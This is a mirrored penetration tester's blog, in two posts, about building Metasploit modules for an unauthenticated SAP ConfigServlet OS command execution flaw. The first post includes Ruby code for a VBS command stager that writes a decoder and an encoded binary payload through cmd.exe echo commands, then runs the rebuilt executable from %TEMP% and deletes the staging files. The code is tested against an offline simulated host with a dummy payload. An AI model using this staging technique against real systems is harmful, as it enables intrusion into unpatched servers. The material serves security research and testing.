SAP ConfigServlet remote code execution metasploit module

Mirrored from my previous site, original URL was: http://blog.kabaiandras.hu/2013/04/sap-configservlet-remote-code-execution.html

Still SAP, and still the same OS command execution vulnerability from my previous post. So what is different? Being able to run OS commands on the target system is good, but you will probably want something more: binary payloads.

After making my SAP ConfigServlet OS Command Execution metasploit module, I started to create a new module for remote code execution.

As it is possible to execute OS commands through the ConfigServlet, it is relatively easy to deliver binary payloads and run them via Metasploit's command stagers. A command stager converts the binary payload into an ASCII-safe form, uses plain OS commands to write out the encoded payload and a small decoder script line by line, runs the decoder to rebuild the binary on disk, and finally executes it. Because VBS is more common in Windows environments than PowerShell, I chose CmdStagerVBS.
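To make the staging step concrete, here is an added example in Ruby (Metasploit's own language) that is not code from the original post and not Metasploit's Rex::Exploitation::CmdStagerVBS. It shows the mechanism the paragraph describes: encode the binary, emit one short cmd.exe command per chunk, drop a decoder, decode, execute. The VBS decoder text, the temporary paths under %TEMP%, the 60-character line length and the FakeWindowsHost class that replays the commands offline are all assumptions made for this example; the real module delegates these details to Metasploit.

```ruby
require 'base64'

# Simplified illustration of a Metasploit-style command stager. This is an
# added example, NOT Metasploit's Rex::Exploitation::CmdStagerVBS: the binary
# payload is base64-encoded, split into chunks short enough to fit in one GET
# request, and turned into a list of cmd.exe one-liners that drop a VBS
# decoder line by line, append the encoded payload to a text file, run the
# decoder with cscript and finally execute the rebuilt binary.
class VbsCmdStager
  # Hypothetical decoder (an assumption of this example): MSXML2 turns the
  # base64 text into bytes and ADODB.Stream writes them out. Every line avoids
  # cmd.exe metacharacters (& | < > ^ %) so that `echo` reproduces it verbatim.
  DECODER_LINES = [
    'Set fs = CreateObject("Scripting.FileSystemObject")',
    'Set f = fs.OpenTextFile(WScript.Arguments(0), 1)',
    'b64 = f.ReadAll',
    'f.Close',
    'Set x = CreateObject("MSXML2.DOMDocument")',
    'Set e = x.createElement("b")',
    'e.dataType = "bin.base64"',
    'e.text = b64',
    'Set s = CreateObject("ADODB.Stream")',
    's.Type = 1',
    's.Open',
    's.Write e.nodeTypedValue',
    's.SaveToFile WScript.Arguments(1), 2',
    's.Close'
  ].freeze

  attr_reader :vbs_path, :b64_path, :exe_path

  def initialize(payload, line_len: 60, dir: '%TEMP%', name: 'svc')
    @payload  = payload.b
    @line_len = line_len
    @vbs_path = "#{dir}\\#{name}.vbs"
    @b64_path = "#{dir}\\#{name}.b64"
    @exe_path = "#{dir}\\#{name}.exe"
  end

  # The redirection goes BEFORE echo on purpose: in "echo s.Type = 1>>file"
  # cmd.exe reads "1>>" as a handle redirection and drops the digit, and a
  # base64 chunk can end in a digit just as easily.
  def echo_into(path, text)
    ">>#{path} echo #{text}"
  end

  # Ordered list of OS commands; each one goes out in its own request.
  def commands
    cmds = DECODER_LINES.map { |l| echo_into(@vbs_path, l) }
    Base64.strict_encode64(@payload).scan(/.{1,#{@line_len}}/) do |chunk|
      cmds << echo_into(@b64_path, chunk)
    end
    cmds << "cscript //nologo #{@vbs_path} #{@b64_path} #{@exe_path}"
    cmds << @exe_path
    cmds << "del #{@vbs_path} #{@b64_path}"
    cmds
  end
end

# Tiny offline stand-in for the remote Windows host: it understands only the
# command shapes the stager emits, so the round trip can be checked without a
# target. Part of the added example, not of any real tool.
class FakeWindowsHost
  attr_reader :files, :executed

  def initialize
    @files = Hash.new { |h, k| h[k] = String.new.b }
    @executed = []
  end

  def run(cmd)
    if (m = cmd.match(/\A>>(\S+) echo (.*)\z/))
      @files[m[1]] << m[2] << "\r\n"
    elsif (m = cmd.match(%r{\Acscript //nologo (\S+) (\S+) (\S+)\z}))
      # The VBS is not interpreted here; its effect (base64 -> bytes) is modelled.
      raise 'decoder was never dropped' unless @files.key?(m[1])
      @files[m[3]] = Base64.decode64(@files[m[2]])
    elsif (m = cmd.match(/\Adel (.+)\z/))
      m[1].split.each { |f| @files.delete(f) }
    else
      @executed << cmd
    end
  end
end

# Constructed sample payload: a fake PE header followed by filler, not real code.
SAMPLE_PAYLOAD = [0x4D, 0x5A, 0x90, 0x00].pack('C*') + (0..255).to_a.pack('C*') * 2

# Drives the whole chain and reports what the "host" ended up with.
def stage_and_run(payload = SAMPLE_PAYLOAD)
  stager = VbsCmdStager.new(payload)
  host = FakeWindowsHost.new
  cmds = stager.commands
  cmds.each { |c| host.run(c) }
  { exe: host.files[stager.exe_path], executed: host.executed,
    command_count: cmds.size, max_cmd_len: cmds.map(&:length).max }
end

if __FILE__ == $PROGRAM_NAME
  r = stage_and_run
  puts "#{r[:command_count]} commands, longest #{r[:max_cmd_len]} chars, " \
       "payload restored: #{r[:exe] == SAMPLE_PAYLOAD}"
end
```

Every emitted command still has to be URL-encoded and sent in a single request, so line_len is the knob that trades request count against request size; the real stagers expose the same trade-off. Note the redirection-first form of the echo commands: a digit immediately before `>` is parsed by cmd.exe as a file handle, so the more natural `echo ...1>>file` would silently lose data.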


SAP ConfigServlet OS command execution metasploit module

Mirrored from my previous site, original URL was: http://blog.kabaiandras.hu/2013/04/sap-configservlet-os-command-execution.html

If you have ever searched for SAP vulnerabilities, you have surely come across some of the ERPScan team's excellent research. That is what happened in our current pentest project as well: a colleague of mine identified several SAP systems in the target network range, and we set out to find well-known vulnerabilities affecting them.

We found a great presentation, Breaking SAP Portal, given by Dmitry Chastuchin of ERPScan at Hacker Halted 2012. One of the slides contains a very interesting screenshot of a simple, remote, unauthenticated OS command execution vulnerability being exploited: with a single GET request it is possible to execute OS commands on the remote system. I searched for existing exploit implementations, but there were no public Metasploit or other exploits available. Surprisingly, it was not just exploits that were missing; there were hardly any relevant search results for this vulnerability at all, so I decided to write a Metasploit module for it.
